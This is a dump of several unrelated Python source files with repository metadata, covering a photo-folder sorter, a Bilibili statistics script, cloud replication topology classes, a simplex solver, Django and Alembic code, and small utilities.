acc[-1][-1])","repo_name":"swjiae/Algorithm","sub_path":"Algorithm/SWEA/Brute_Force/보급로.py","file_name":"보급로.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21916542271","text":"import glob\nimport pandas as pd\nimport numpy as np\nimport pptk\n\ndata_path = '/Users/jchilders/randlesESP/data'\nfilelist = glob.glob(data_path + '/*combined_csv*.csv')\nprint('Found ',len(filelist), 'files')\nprint('filelist: ')\nfor i,filename in enumerate(filelist):\n print(i,'. ',filename)\n\n\ndef sub_sample(filelist):\n\n data = pd.read_csv(filelist[0])\n data = data[['1','2','3']].to_numpy()\n\n img_size = len(data)\n n_sub_imgs = 1000\n sub_img_size = int(img_size / n_sub_imgs)\n for i in range(n_sub_imgs):\n sub_img = data[i*sub_img_size:(i+1)*sub_img_size,:]\n print(' number of points: ',len(sub_img))\n v = pptk.viewer(sub_img)\n v.set(point_size=0.01)\n print('waiting...')\n v.wait()\n #input('hit enter')\n #v.()\n\ndef full_image(filelist):\n\n for filename in filelist:\n print('plotting filename: ',filename)\n data = pd.read_csv(filename)\n print(' number of points: ',len(data))\n data = data[['1','2','3']].to_numpy()\n\n v = pptk.viewer(data)\n v.set(point_size=0.001)\n print('waiting...')\n v.wait()\n\nsub_sample(filelist)","repo_name":"jtchilders/randles_esp","sub_path":"randles_visual.py","file_name":"randles_visual.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31598368656","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport re\nimport logging\nimport argparse\n\n\"\"\"\nauthor: cyrus (cheenpo@gmail.com)\nreason: I wrote this because exporting photos from the macOS application called \"Photos\"\n does not export them in the basic concept of folders by date :/\n\"\"\"\n\n\ndef form_folder(groups):\n \"\"\"\n take in a date tuple and form the folder name\n \"\"\"\n month = groups[0]\n day = groups[1]\n year = groups[2]\n if month in month_map:\n month = month_map[month]\n else:\n logger.error(\"month ({}) not in month_map. this should never happen\".format(month))\n return None\n if len(day) == 1:\n day = \"0{}\".format(day)\n return \"{}-{}-{}\".format(year, month, day)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"sanitize iPhoto moment export\")\n parser.add_argument(\"dir\", action=\"store\", help=\"directory to sanitize\")\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--test', action='store_true', default=False)\n args = parser.parse_args()\n\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(level=logging_level, stream=sys.stdout, format='%(levelname)s %(asctime)s %(message)s', datefmt='%Y-%d-%m %H:%M:%S')\n logger = logging.getLogger(__name__)\n\n file_rename_limit = 3\n month_map = {\n \"January\": \"01\",\n \"February\": \"02\",\n \"March\": \"03\",\n \"April\": \"04\",\n \"May\": \"05\",\n \"June\": \"06\",\n \"July\": \"07\",\n \"August\": \"08\",\n \"September\": \"09\",\n \"October\": \"10\",\n \"November\": \"11\",\n \"December\": \"12\"\n }\n re_good = r\"^\\d\\d\\d\\d-\\d\\d-\\d\\d$\"\n re_match1 = r\".*(January|February|March|April|May|June|July|August|September|October|November|December) (\\d+), (\\d\\d\\d\\d)\"\n overall_good = True\n\n stats = {\"files_moved\": 0, \"files_renamed\": 0, \"mkdirs\": 0, \"rmdirs\": 0, \"stats_fake\": args.test}\n\n logger.info(\"starting sanity on: {}, test: {}, debug: {}\".format(args.dir, args.test, args.debug))\n dirs = [dI for dI in os.listdir(args.dir) if os.path.isdir(os.path.join(args.dir,dI))]\n for dir in dirs:\n orig_path = \"{}/{}\".format(args.dir, dir)\n if args.dir.endswith(\"/\"):\n orig_path = \"{}{}\".format(args.dir, dir)\n\n is_good = re.match(re_good, dir)\n is_match1 = re.match(re_match1, dir)\n dir_good = True if (is_good or is_match1) else False\n overall_good = overall_good and dir_good\n logger.debug(\"in: {}, is_good: {}, is_match1: {}, dir_good: {}\".format(dir, is_good, is_match1, dir_good))\n if is_good:\n logger.info(\"format is good, skipping: {}\".format(dir))\n elif is_match1:\n logger.info(\"handle match1: {}\".format(dir))\n groups = is_match1.groups()\n dst_folder = form_folder(is_match1.groups())\n if dst_folder is None:\n logger.error(\"skipping dir: {}\".format(dir))\n continue\n else:\n # make sure path exists\n dst_path = \"{}/{}\".format(args.dir, dst_folder)\n if args.dir.endswith(\"/\"):\n dst_path = \"{}{}\".format(args.dir, dst_folder)\n\n dst_folder_exists = os.path.isdir(dst_path)\n logger.info(\"{} exists: {}\".format(dst_folder, dst_folder_exists))\n if not dst_folder_exists:\n if args.test:\n logger.info(\"would mkdir: {}\".format(dst_path))\n else:\n logger.info(\"mkdir: {}\".format(dst_path))\n os.mkdir(dst_path)\n stats[\"mkdirs\"] = stats[\"mkdirs\"] + 1\n\n # move files over\n files = os.listdir(orig_path)\n for file in files:\n i = 0\n orig_file_path = \"{}/{}\".format(orig_path, file)\n dst_file_path = None\n dst_file_exists = True\n while(dst_file_exists):\n if i > 0:\n logger.info(\"increasing file rename for {}\".format(orig_file_path))\n stats[\"files_renamed\"] = stats[\"files_renamed\"] + 1\n dst_file_path = \"{}/{}{}\".format(dst_path, \"0\"*i, file)\n dst_file_exists = os.path.exists(dst_file_path)\n logger.debug(\"{} -> {}, dst_file_exists: {}\".format(orig_file_path, dst_file_path, dst_file_exists))\n i = i + 1\n if i > file_rename_limit:\n logger.error(\"file_rename_limit exceeded, something is busted\")\n sys.exit(1)\n if args.test:\n logger.info(\"would mv {} -> {}\".format(orig_file_path, dst_file_path))\n else:\n logger.info(\"mv {} -> {}\".format(orig_file_path, dst_file_path))\n os.rename(orig_file_path, dst_file_path)\n stats[\"files_moved\"] = stats[\"files_moved\"] + 1\n\n # delete src dir if empty\n if not os.listdir(orig_path):\n if args.test:\n logger.info(\"would rmdir {}\".format(orig_path))\n else:\n logger.info(\"rmdir {}\".format(orig_path))\n os.rmdir(orig_path)\n stats[\"rmdirs\"] = stats[\"rmdirs\"] + 1\n\n else:\n logger.warn(\"unhandled dir: {}\".format(dir))\n\n logger.info(stats)\n logger.info(\"overall_good: {}\".format(overall_good))\n","repo_name":"cheenpo/toolbox","sub_path":"a_better_photos_export.py","file_name":"a_better_photos_export.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11292145079","text":"from rest_framework_nested import routers\n\nfrom . import viewsets\n\nrouter = routers.DefaultRouter()\nrouter.register('members', viewsets.MemberViewset)\n\nmember_router = routers.NestedSimpleRouter(\n parent_router=router,\n parent_prefix='members',\n lookup='member'\n)\nmember_router.register(\n prefix='fields',\n viewset=viewsets.MemberFieldViewset,\n basename='member-fields'\n)\n\nurlpatterns = router.urls\nurlpatterns += member_router.urls\n","repo_name":"hugoseabra/mailchimp-service","sub_path":"audience/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34294257074","text":"import json\nimport pymysql\nimport math\nimport time\nfrom decimal import Decimal\n\n# 连接数据库\ndb=pymysql.connect(host='127.0.0.1', user='root', passwd='456789', db='biliup', port=3306, charset='utf8', cursorclass = pymysql.cursors.DictCursor)\ndb.autocommit(True)\ncursor=db.cursor()\n\n# 获取类型相关的统计\n# 先获取所有类型\ncursor.execute('select distinct category from biliup')\ncate=list(map(lambda x:x['category'],cursor.fetchall()))\ncate.remove('公告') #就一个人,情况也比较特殊,就不管他了\ncate.remove('无') #没有类型也不管了\nprint(cate)\n# 各类型的相关统计\ncategories={}\nfor cat in cate:\n\tcursor.execute('select count(*) as num,avg(follow) as follow,avg(fans) as fans,avg(video) as video,\\\n\t\t\t\t\tavg(playNum) as playNum from biliup where category = %s',cat)\n\tcategories[cat]=cursor.fetchone()\n\t# 性别比例需排除保密的up\n\tcursor.execute('select avg(sex) as sex from biliup where category = %s and sex != 0',cat)\n\tcategories[cat].update(cursor.fetchone())\nprint(categories)\n# 打印信息用于主页\nfor k,v in categories.items():\n\tprint(k+\":\"+str(v['num']))\ncategory=[]\n# 打印信息用于类型页面\nfor cat in categories:\n\t# 性别改为百分比\n\tcategories[cat]['sex']=(categories[cat]['sex']-1)*100\n\tfor x in categories[cat]:\n\t\tif x!='num':\n\t\t\t# Decimal转float\n\t\t\tcategories[cat][x]=float(categories[cat][x])\n\ty=categories[cat].copy()\n\tdel y['num']\n\ty['name']=cat\n\tcategory.append(y)\nprint(category)\n# 打印不分类的统计信息,用于类型页面的平均数\ncursor.execute('select avg(video) as video,avg(follow) as follow,avg(fans) as fans,avg(playNum) as playNum from biliup')\naverage=cursor.fetchone()\ncursor.execute('select avg(sex) as sex from biliup where sex != 0') #性别比例需排除保密的up\naverage.update(cursor.fetchone())\naverage['sex']=(average['sex']-1)*100 #性别改为百分比\nfor avg in average:\n\taverage[avg]=float(average[avg]) #Decimal转float\nprint(average)\n\n# 打印性别信息用于主页\nsexes={}\nfor sex in range(0,3):\n\tcursor.execute('select count(*) from biliup where sex = %s',sex)\n\tsexes[sex]=cursor.fetchone()['count(*)']\nprint(sexes)\n\n# 打印等级信息用于主页\nlevels={}\nfor lev in range(0,7):\n\tcursor.execute('select count(*) from biliup where level = %s',lev)\n\tlevels[lev]=cursor.fetchone()['count(*)']\nprint(levels)\n\n# 打印星座信息用于主页\ndate2star=[20,19,21,20,21,22,23,23,23,24,23,22]\nstar=[\"摩羯座\",\"水瓶座\",\"双鱼座\",\"白羊座\",\"金牛座\",\"双子座\",\"巨蟹座\",\"狮子座\",\"处女座\",\"天秤座\",\"天蝎座\",\"射手座\",\"摩羯座\"]\nstars={} #用于记录各星座的dict\nfor sta in star:\n\tstars[sta]=0 #初始为0\n# 取出生日信息\ncursor.execute('select birth from biliup')\nbirth=list(map(lambda x:x['birth'],cursor.fetchall()))\nfor bir in birth:\n\t# 排除生日保密或系统默认值(01-01)的\n\tif bir !=' none' and bir !='01-01':\n\t\t# 生日转星座\n\t\tbir=bir.split('-')\n\t\tmonth=int(bir[0])\n\t\tday=int(bir[1])\n\t\tsta=star[month-1] if day Dict:\n \"\"\"Serialize to dict with type information.\"\"\"\n return {\"type\": self.__class__.__name__, \"fields\": self.__dict__}\n\n @classmethod\n def from_dict(cls, topology_dict: Dict) -> \"ReplicationTopologyNode\":\n \"\"\"Deserialize from dict with type information.\"\"\"\n if topology_dict[\"type\"] == \"ReplicationTopologyGateway\":\n return ReplicationTopologyGateway.from_dict_fields(topology_dict[\"fields\"])\n elif topology_dict[\"type\"] == \"ReplicationTopologyObjectStore\":\n return ReplicationTopologyObjectStore.from_dict_fields(topology_dict[\"fields\"])\n else:\n raise ValueError(\"Unknown topology node type: {}\".format(topology_dict[\"type\"]))\n\n @classmethod\n def from_dict_fields(cls, fields: Dict):\n \"\"\"Deserialize from dict with type information.\"\"\"\n return cls(**fields)\n\n\n@dataclass\nclass ReplicationTopologyGateway(ReplicationTopologyNode):\n instance: int\n\n def __hash__(self) -> int:\n return hash((self.region, self.instance))\n\n\n@dataclass\nclass ReplicationTopologyObjectStore(ReplicationTopologyNode):\n def __hash__(self) -> int:\n return hash(self.region)\n\n\nclass ReplicationTopology:\n \"\"\"\n ReplicationTopology stores a DAG where nodes are an instance in a cloud region\n (e.g. \"aws:us-east-1\", instance 0) and edges denote a connection to another\n cloud region (e.g. (\"aws:us-east-1\", 0) -> (\"aws:us-west-2\", 1) with an\n associated number of connections (e.g. 64).\n \"\"\"\n\n def __init__(\n self,\n edges: Optional[List[Tuple[ReplicationTopologyNode, ReplicationTopologyNode, int]]] = None,\n cost_per_gb: Optional[float] = None,\n ):\n self.edges: List[Tuple[ReplicationTopologyNode, ReplicationTopologyNode, int]] = edges or []\n self.nodes: Set[ReplicationTopologyNode] = set(k[0] for k in self.edges) | set(k[1] for k in self.edges)\n self.cost_per_gb: Optional[float] = cost_per_gb\n\n @property\n def gateway_nodes(self) -> Set[ReplicationTopologyGateway]:\n return {n for n in self.nodes if isinstance(n, ReplicationTopologyGateway)}\n\n @property\n def obj_store_nodes(self) -> Set[ReplicationTopologyObjectStore]:\n return {n for n in self.nodes if isinstance(n, ReplicationTopologyObjectStore)}\n\n def add_instance_instance_edge(self, src_region: str, src_instance: int, dest_region: str, dest_instance: int, num_connections: int):\n \"\"\"Add relay edge between two instances.\"\"\"\n src_gateway = ReplicationTopologyGateway(src_region, src_instance)\n dest_gateway = ReplicationTopologyGateway(dest_region, dest_instance)\n self.edges.append((src_gateway, dest_gateway, int(num_connections)))\n self.nodes.add(src_gateway)\n self.nodes.add(dest_gateway)\n\n def add_objstore_instance_edge(self, src_region: str, dest_region: str, dest_instance: int):\n \"\"\"Add object store to instance node (i.e. source bucket to source gateway).\"\"\"\n src_objstore = ReplicationTopologyObjectStore(src_region)\n dest_gateway = ReplicationTopologyGateway(dest_region, dest_instance)\n self.edges.append((src_objstore, dest_gateway, 0))\n self.nodes.add(src_objstore)\n self.nodes.add(dest_gateway)\n\n def add_instance_objstore_edge(self, src_region: str, src_instance: int, dest_region: str):\n \"\"\"Add instance to object store edge (i.e. destination gateway to destination bucket).\"\"\"\n src_gateway = ReplicationTopologyGateway(src_region, src_instance)\n dest_objstore = ReplicationTopologyObjectStore(dest_region)\n self.edges.append((src_gateway, dest_objstore, 0))\n self.nodes.add(src_gateway)\n self.nodes.add(dest_objstore)\n\n def get_outgoing_paths(self, src: ReplicationTopologyNode):\n \"\"\"Return nodes that follow src in the topology.\"\"\"\n return {dest_gateway: num_connections for src_gateway, dest_gateway, num_connections in self.edges if src_gateway == src}\n\n def get_incoming_paths(self, dest: ReplicationTopologyNode):\n \"\"\"Return nodes that precede dest in the topology.\"\"\"\n return {src_gateway: num_connections for dest_gateway, src_gateway, num_connections in self.edges if dest_gateway == dest}\n\n def source_instances(self) -> Set[ReplicationTopologyGateway]:\n nodes = self.nodes - {v for u, v, _ in self.edges if not isinstance(u, ReplicationTopologyObjectStore)}\n return {n for n in nodes if isinstance(n, ReplicationTopologyGateway)}\n\n def sink_instances(self) -> Set[ReplicationTopologyGateway]:\n nodes = self.nodes - {u for u, v, _ in self.edges if not isinstance(v, ReplicationTopologyObjectStore)}\n return {n for n in nodes if isinstance(n, ReplicationTopologyGateway)}\n\n def source_region(self) -> str:\n instances = list(self.source_instances())\n assert all(\n i.region == instances[0].region for i in instances\n ), f\"All source instances must be in the same region, but found {instances}\"\n return instances[0].region\n\n def sink_region(self) -> str:\n instances = list(self.sink_instances())\n assert all(i.region == instances[0].region for i in instances), \"All sink instances must be in the same region\"\n return instances[0].region\n\n def per_region_count(self) -> Dict[str, int]:\n counts = {}\n for node in self.nodes:\n if isinstance(node, ReplicationTopologyGateway):\n counts[node.region] = counts.get(node.region, 0) + 1\n return counts\n\n def to_json(self):\n \"\"\"\n Returns a JSON representation of the topology.\n \"\"\"\n edges = []\n for e in self.edges:\n edges.append({\"src\": e[0].to_dict(), \"dest\": e[1].to_dict(), \"num_connections\": int(e[2])})\n return json.dumps(dict(replication_topology_edges=edges))\n\n @classmethod\n def from_json(cls, json_str: str):\n \"\"\"\n Returns a ReplicationTopology from a JSON string.\n \"\"\"\n in_dict = json.loads(json_str)\n assert \"replication_topology_edges\" in in_dict\n edges = []\n for edge in in_dict[\"replication_topology_edges\"]:\n edges.append(\n (ReplicationTopologyNode.from_dict(edge[\"src\"]), ReplicationTopologyNode.from_dict(edge[\"dest\"]), edge[\"num_connections\"])\n )\n return ReplicationTopology(edges)\n\n def to_graphviz(self):\n import graphviz as gv # pytype: disable=import-error\n\n # if dot is not installed\n has_dot = shutil.which(\"dot\") is not None\n if not has_dot:\n logger.error(\"Graphviz is not installed. Please install it to plot the solution (sudo apt install graphviz).\")\n return None\n\n g = gv.Digraph(name=\"throughput_graph\")\n g.attr(rankdir=\"LR\")\n subgraphs = {}\n for src_gateway, dest_gateway, n_connections in self.edges:\n # group node instances by region\n src_region, src_instance = (\n src_gateway.region,\n src_gateway.instance if isinstance(src_gateway, ReplicationTopologyGateway) else \"objstore\",\n )\n dest_region, dest_instance = (\n dest_gateway.region,\n dest_gateway.instance if isinstance(dest_gateway, ReplicationTopologyGateway) else \"objstore\",\n )\n src_region, dest_region = src_region.replace(\":\", \"/\"), dest_region.replace(\":\", \"/\")\n src_node = f\"{src_region}, {src_instance}\"\n dest_node = f\"{dest_region}, {dest_instance}\"\n\n # make a subgraph for each region\n if src_region not in subgraphs:\n subgraphs[src_region] = gv.Digraph(name=f\"cluster_{src_region}\")\n subgraphs[src_region].attr(label=src_region)\n if dest_region not in subgraphs:\n subgraphs[dest_region] = gv.Digraph(name=f\"cluster_{dest_region}\")\n subgraphs[dest_region].attr(label=dest_region)\n\n # add nodes\n subgraphs[src_region].node(src_node, label=str(src_instance), shape=\"box\")\n subgraphs[dest_region].node(dest_node, label=str(dest_instance), shape=\"box\")\n\n # add edges\n g.edge(\n src_node,\n dest_node,\n label=f\"{n_connections} connections\" if src_instance != \"objstore\" and dest_instance != \"objstore\" else None,\n )\n\n for subgraph in subgraphs.values():\n g.subgraph(subgraph)\n\n return g\n\n\n@dataclass\nclass ReplicationJob:\n source_region: str\n source_bucket: Optional[str]\n dest_region: str\n dest_bucket: Optional[str]\n\n # object transfer pairs (src, dest)\n transfer_pairs: List[Tuple[ObjectStoreObject, ObjectStoreObject]]\n\n # progress tracking via a list of chunk_requests\n chunk_requests: Optional[List[ChunkRequest]] = None\n\n # Generates random chunks for testing on the gateways\n random_chunk_size_mb: Optional[int] = None\n\n @property\n def transfer_size(self):\n if not self.random_chunk_size_mb:\n return sum(source_object.size for source_object, _ in self.transfer_pairs)\n else:\n return self.random_chunk_size_mb * len(self.transfer_pairs) * MB\n","repo_name":"c3lab-net/skyplane","sub_path":"skyplane/replicate/replication_plan.py","file_name":"replication_plan.py","file_ext":"py","file_size_in_byte":9630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"866447429","text":"# external links, package imports, file paths etc.\nimport os\n\n### CSV FILE DIRECTORY\n\ncsv_dir = os.path.abspath((os.path.dirname( __file__ )))\n\n### BFI URL\n\nvoterlist_url = 'http://www.bfi.org.uk/films-tv-people/sightandsoundpoll2012/voters'\nfilm_url = 'http://www.bfi.org.uk/films-tv-people/'\n","repo_name":"charlloyd/film-gaze","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23355108453","text":"# simplex.py\n\"\"\"\n\n\n<1/26/17>\n\"\"\"\n\nimport numpy as np\n\n# Problems 1-6\nclass SimplexSolver(object):\n \"\"\"Class for solving the standard linear optimization problem\n\n maximize c^Tx\n subject to Ax <= b\n x >= 0\n via the Simplex algorithm, as long as the problem is feasible at the origin\n \"\"\"\n\n def __init__(self, c, A, b):\n \"\"\"\n\n Parameters:\n c (1xn ndarray): The coefficients of the linear objective function.\n A (mxn ndarray): The constraint coefficients matrix.\n b (1xm ndarray): The constraint vector.\n\n Raises:\n ValueError: if the given system is infeasible at the origin.\n \"\"\"\n #Check feasibility.\n x=np.zeros_like(c)\n m,n=np.shape(A)\n c = c.reshape(len(c),1)\n b = b.reshape(len(b),1)\n\n if np.all(np.less_equal(A.dot(x),b)): #x=0 ==> Ax= 0:\n best_ratio = my_ratio\n pivot_row = row_element\n\n return pivot_row\n\n #This is how we pivot\n def pivot(self, pivot_row, pivot_col):\n tab = self.Tableau\n pivot_entry = tab[pivot_row,pivot_col]\n\n #Divide the pivot row by the value of the pivot entry\n tab[pivot_row] /= pivot_entry\n\n #Use the pivot row to zero out all entries in the pivot column above and below the pivot entry\n for row in xrange(len(tab)): #-1 to account for the index starting at 0\n if row != pivot_row:\n tab[row] -= (tab[row, pivot_col]/tab[pivot_row,pivot_col])*(tab[pivot_row])\n \n return tab\n\n def solve(self):\n \"\"\"Solve the linear optimization problem.\n\n Returns:\n (float) The maximum value of the objective function.\n (dict): The basic variables and their values.\n (dict): The nonbasic variables and their values.\n \"\"\"\n\n #First, if it's unbounded raise an error\n if np.all(self.Tableau[:,1:] <=0):\n raise ValueError(\"This problem is undbounded\") #Don't mark this wrong, Koa said it's right\n\n #This gets our final tableau\n final_answer = self.pivot(self.pivot_row(), self.pivot_col())\n while np.any(self.Tableau[0]<0):\n final_answer = self.pivot(self.pivot_row(), self.pivot_col())\n \n #optimal value\n optimal_value = final_answer[0,0]\n\n #Initialize our dictionaries\n basic_variables = dict()\n nonbasic_variables = dict()\n \n #Update our dictionaries\n for i in xrange(len(final_answer[0,1:])):\n i+=1\n if final_answer[0,i]==0:\n index = np.argmax(final_answer[:,i])\n basic_variables[i-1] = final_answer[index,0]\n else:\n nonbasic_variables[i-1] = 0\n\n #Return optimal, basic, nonbasic\n return optimal_value, basic_variables, nonbasic_variables\n \n\n\n\n# Problem 7\ndef prob7(filename='Data/productMix.npz'):\n \"\"\"Solve the product mix problem for the data in 'productMix.npz'.\n\n Parameters:\n filename (str): the path to the data file.\n\n Returns:\n The minimizer of the problem (as an array).\n \"\"\"\n #Get our variables\n mix = np.load(filename)\n A = mix['A']\n p = mix['p']\n lp = len(p)\n p=p.reshape((lp,1))\n m = mix['m']\n lm = len(m)\n m = m.reshape((lm,1))\n d = mix['d']\n ld = len(d)\n d = d.reshape((ld,1))\n\n #Let it begin\n c = np.array(p)\n A = np.vstack((A, np.eye(len(d))))\n b = np.vstack((m, d))\n \n\n answer = SimplexSolver(c,A,b).solve()\n my_dict = answer[1]\n final_answer = np.array([my_dict[0],my_dict[1],my_dict[2],my_dict[3]]) \n return final_answer\n\n","repo_name":"jafekb/projects","sub_path":"Optimization/simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7845119810","text":"\"\"\"added scheme and item groups\n\nRevision ID: add5acbedeb5\nRevises: 1f22485ea3c6\nCreate Date: 2021-11-27 12:34:27.765136\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'add5acbedeb5'\ndown_revision = '1f22485ea3c6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('item_groups',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('subject_id', sa.Integer(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['subject_id'], ['subjects.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('specifications',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('created_at', sa.DateTime(timezone=True), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('specifications')\n op.drop_table('item_groups')\n # ### end Alembic commands ###\n","repo_name":"MTC-Thailand/exam","sub_path":"migrations/versions/add5acbedeb5_added_scheme_and_item_groups.py","file_name":"add5acbedeb5_added_scheme_and_item_groups.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31756852696","text":"import xarray as xr\nimport numpy as np\n\n\n# def monotone_divide(x: xr.DataArray or xr.Dataset, dim=None):\n# if dim is None:\n# raise ValueError('dim needs to be specified.')\n# dx = x.diff(dim)\n# print(x)\n# incr = dx > 0\n# right_end = (incr != incr.shift({dim: -1})).pad({dim: (1, 0)}, constant_values=False)\n# # left_end = (incr != incr.shift({dim: 1})).pad({dim: (1, 0)}, constant_values=False)\n# # print(x.where(arange(x.sizes[dim]), drop=True))\n# print(x[dim].where(right_end, drop=True))\n\n\nfrom typing import Iterable, Dict\n\n\ndef slice_accumulate(x: xr.Dataset or xr.DataArray, edges: Dict[str, Iterable[float]], method='sum'):\n for key, value in edges.items():\n coord_range_edges = list(zip(value, value[1::]))\n coord_ranges = [slice(*edge_pair, None) for edge_pair in coord_range_edges]\n slices_one_dimension = [x.sel({key: coord_range}) for coord_range in coord_ranges]\n if method == 'mean':\n slices_one_dimension = [el.mean(key) for el in slices_one_dimension]\n elif method == 'sum':\n slices_one_dimension = [el.sum(key) for el in slices_one_dimension]\n x = xr.concat(slices_one_dimension, key)\n x = x.assign_coords({key: [str(x) for x in coord_range_edges]})\n return x\n\n\nxr.DataArray.slice_accumulate = slice_accumulate\nxr.Dataset.slice_accumulate = slice_accumulate\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n a = np.linspace(-5, 5, 11)\n b = np.linspace(-7, 7, 15)\n A, B = np.meshgrid(a, b, indexing='ij')\n C = A**2+B**2\n array = xr.DataArray(C, dims=('x', 'y'), coords={'x': a, 'y': b})\n slice_accumulate(array, {'x': [-5, -2, 3, 5], 'y': [-7, -4, 2, 5]}, method='mean').plot(x='x', y='y')\n plt.show()\n","repo_name":"mrschweizer/PyThat","sub_path":"src/PyThat/helpers/ROI.py","file_name":"ROI.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"22460279951","text":"class Solution(object):\n \"\"\"\n This is an example of prefix-sum problem. We are counting the number of subarrays\n that have sum of S. We know that A[0, j] = A[0] + A[1] + ... + A[j], and therefore\n A[i, j] = A[0, j] - A[0, i]. The number of i, j pairs that satisfy A[i, j] = S is\n what we are looking for. We can use an array of size N + 1 to keep track the num\n of subarrays that sum to its array index. For example, pre_sum[3] = 5 means that\n there are 5 A[0, i] subarrays that sum to its index, 3. By re-arranging the\n equation from earlier, we get A[0, i] = A[0, j] - A[i, j]. For each iteration, we\n calculate the current sum minus our target S, A[0, j] - S, which equals to A[0, i],\n the remaining sum. Then, we can look up pre_sum table to find out how many\n subarrays have the sum of A[0, i].\n \"\"\"\n\n def numSubarraysWithSum(self, a, s):\n \"\"\"\n :type A: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n total = 0 # number of valid subarrays sums to s\n curr_sum = 0 # sum of a[0, i]\n pre_sum = [0] * (len(a) + 1) # remember number of arrays sums to its index\n pre_sum[0] = 1 # let the number of subarray that sums to 0 be 1\n \n for i in range(len(a)):\n curr_sum += a[i]\n if curr_sum >= s:\n total += pre_sum[curr_sum - s]\n pre_sum[curr_sum] += 1\n \n return total","repo_name":"hsuanhauliu/leetcode-solutions","sub_path":"medium/binary-subarrays-with-sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21728166764","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Buttons\")\r\n\r\n\r\n# making function\r\ndef callback():\r\n label.config(text=\"You clicked me!\", fg=\"red\", bg=\"yellow\")\r\n button[\"state\"] = \"disabled\" # disabling the button\r\n\r\n\r\n# creating the label\r\nlabel = Label(root, text=\"Hello python\")\r\nlabel.pack()\r\n\r\n# creating button with command\r\nbutton = Button(root, text=\"Click Me!\", command=callback)\r\n\r\nbutton.pack()\r\n\r\nroot.geometry(\"400x400\")\r\nroot.mainloop()\r\n","repo_name":"reeda8940/Python","sub_path":"Gui basics/Button with function.py","file_name":"Button with function.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"13564296713","text":"from typing import Dict, List\n\nfrom bson import ObjectId\nimport copy\n\nfrom NEAT.ErrorHandling.Exceptions.NetworkProtocolException import NetworkProtocolException\nfrom NEAT.ErrorHandling.Exceptions.NetworkTimeoutException import NetworkTimeoutException\nfrom NEAT.GenomeStructures.StorageStructure.StorageGenome import StorageGenome\nfrom NEAT.Networking.Commands.BaseCommand import BaseCommand\nfrom NEAT.Networking.Server.NEATServer import NEATServer\n\n\nclass SimulationConnector(object):\n \"\"\"\n A class providing a high-level interface to\n a client connected via the NEATClient.\n It receives commands from NEATServer's message\n queue und responds to them.\n When a function from SimulationConnector is called,\n the client is expected to have sent a certain command\n (if there are no commands in the message queue, the Server\n will wait for the next command to be received). If the\n client has sent another command, or a command where\n the expected parameters are not present,\n NetworkProtocolException will be raised.\n \"\"\"\n\n def __init__(self) -> None:\n self._server = NEATServer() # type: NEATServer\n\n def _listen_for_command(\n self,\n command_type: str,\n parameter_filter: Dict[str, object]=None,\n timeout: int = None\n ) -> BaseCommand:\n \"\"\"\n Waits for the message queue to have a command ready,\n pops the command from the queue and inspects it.\n Returns the received command if it's type and parameters\n match type / filter.\n If the next received command does not match,\n NetworkProtocolException is raised.\n :param command_type: The type of the expected command as string\n :param parameter_filter: A dictionary of parameters that are expected to be\n present in the command's parameters.\n :param timeout: The timeout after which the attempt to get\n the command will fail\n :return: The received command object\n \"\"\"\n # TODO: timeouts, more error handling\n command = self._server.fetch(timeout)\n print(\"Received: \", command)\n if not command:\n raise NetworkTimeoutException\n\n if not command.type == command_type:\n self._respond_to_command(command, acknowledged=False)\n raise NetworkProtocolException(\n \"Wrong command type encountered: \" +\n command._type +\n \", expected \" +\n command_type +\n 